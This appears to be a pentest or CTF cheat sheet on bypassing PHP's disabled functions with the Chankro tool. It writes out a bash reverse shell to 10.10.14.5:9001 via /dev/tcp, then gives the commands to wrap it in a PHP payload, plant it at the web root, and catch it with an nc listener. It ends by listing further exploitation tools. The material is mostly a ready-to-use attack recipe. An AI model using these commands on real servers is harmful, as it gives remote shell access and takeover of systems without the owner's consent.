Sometimes system, exec, shell_exec, and other dangerous PHP functions are disabled. Chankro helps us bypass these by using LD_PRELOAD and custom shared objects.

๐Ÿง  Step-by-Step Guide

๐Ÿ” 1. Identify Target Architecture

  • Access the phpinfo.php page on the target.
  • Look for architecture info:
    • Architecture => x86_64 โ†’ 64-bit
    • Architecture => i686 or i386 โ†’ 32-bit

๐Ÿ’ฃ 2. Create Shell Script

Prepare a Bash reverse shell in a file named shell:

echo "bash -c 'exec bash -i >& /dev/tcp/10.10.14.5/9001 0>&1'" > shell

โš™๏ธ 3. Install Chankro

If not installed:

git clone https://github.com/TarlogicSecurity/Chankro.git
cd Chankro
python2 chankro.py --help

๐Ÿ› ๏ธ 4. Generate PHP Payload with Chankro

Use this command template:

python2 chankro.py --arch ARCH --input shell --output payload.php --path /var/www/html/<app_folder>

Replace:

  • ARCH โ†’ 32 or 64 based on step 1
  • shell โ†’ the file with your payload
  • payload.php โ†’ the final payload name
  • path โ†’ the full path from DOCUMENT_ROOT (found in phpinfo())

โœ… Example

python2 chankro.py --arch 64 --input shell --output rev.php --path /var/www/html/fa5fba5f5a39d27d8bb7fe5f518e00db

๐Ÿ–ฅ๏ธ Start Listener on Attacker Machine

nc -lvnp 9001

๐Ÿงช Additional Notes

  • Chankro works by abusing LD_PRELOAD trick when PHP is running in mod_php.
  • Works well when disable_functions, open_basedir, and other hardening techniques are in place.
  • Does not work in environments using PHP-FPM with separate privilege drops.

๐Ÿ”„ Related Tools

  • PHPGGC โ€“ For deserialization-based shell payloads.
  • socat โ€“ For more stable reverse shells.
  • LinPEAS โ€“ To identify misconfigurations for further exploitation.
  • php-reverse-shell.php โ€“ Basic reverse shell (fallback when system() is enabled).